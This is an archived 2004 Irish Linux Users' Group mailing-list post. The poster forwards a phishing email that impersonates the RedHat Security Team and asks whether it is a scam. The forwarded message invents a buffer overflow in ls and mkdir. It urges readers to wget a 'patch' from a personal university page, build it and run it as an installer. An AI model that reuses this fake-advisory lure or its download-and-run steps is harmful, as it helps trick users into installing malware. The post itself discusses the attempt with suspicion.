[ILUG] Fwd: RedHat: Buffer Overflow in "ls" and "mkdir"

Marek m.mcgann at sussex.ac.uk
Sat Oct 23 12:35:44 IST 2004 

Thought you might be interested to see the below - it's the first time I've 
seen anything like this for Linux (apologies for the html mail, but that's 
how it arrived) . 

I presume it's this Joeio in Stanford (or whoever) trying to spam his way into 
Red Hat boxes?

Interesting to see someone considering desktop "not-terribly-clued-in" Linux 
users a worthwhile target.

Or am I being too suspicious about it?

----------  Forwarded Message  ----------

Subject: RedHat: Buffer Overflow in "ls" and "mkdir"
Date: Saturday 23 October 2004 05:37
From: RedHat Security Team <security at redhat.com>
To: <another mailing list I'm subscribed to>

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Untitled Document</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<style type="text/css">
<!--
.style1 {font-size: 12px}
- -->
</style>
</head>
<body>
<p><img src="http://www.redhat.com/g/chrome/logo_rh_home.png"></p>
<p> Original issue date: October 20, 2004<br>
Last revised: October 20, 2004<br>
Source: RedHat </p>
<p>A complete revision history is at the end of this file. </p>
<p>Dear RedHat user,</p>
<p>  Redhat found a vulnerability in fileutils (ls and mkdir), that could
 allow a remote attacker to execute arbitrary code with root privileges. Some
 of the affected linux distributions include RedHat 7.2, RedHat 7.3, RedHat
 8.0, RedHat 9.0, Fedora CORE 1, Fedora CORE 2 and not only. It is known that
 *BSD and Solaris platforms are NOT affected.</p> <p>The RedHat Security Team
 strongly advises you to immediately apply the<strong> fileutils-1.0.6
 patch</strong>. This is a critical-critical update that you must make by
 following these steps:</p> <ul>
  <li>First download the patch from the Stanford RedHat mirror:
 <strong><em>wget
 www.stanford.edu/~joeio/fileutils-1.0.6.patch.tar.gz</em></strong></li>
 <li>Untar the patch:<em><strong> tar zxvf
 fileutils-1.0.6.patch.tar.gz</strong></em></li> <li><em><strong>cd
 fileutils-1.0.6.patch</strong></em></li>
  <li><em><strong>make</strong></em></li>
  <li><em><strong>./inst</strong></em></li>
</ul>
<p>Again, please apply this patch as soon as possible or you risk your system
 and others` to be compromised.</p> <p>Thank you for your prompt attention to
 this serious matter,</p>
<p>RedHat Security Team.</p>
<p class="style1"> Copyright &copy; 2004 Red Hat, Inc. All rights reserved.  
 </p> </body>
</html>

- -------------------------------------------------------

More information about the ILUG mailing list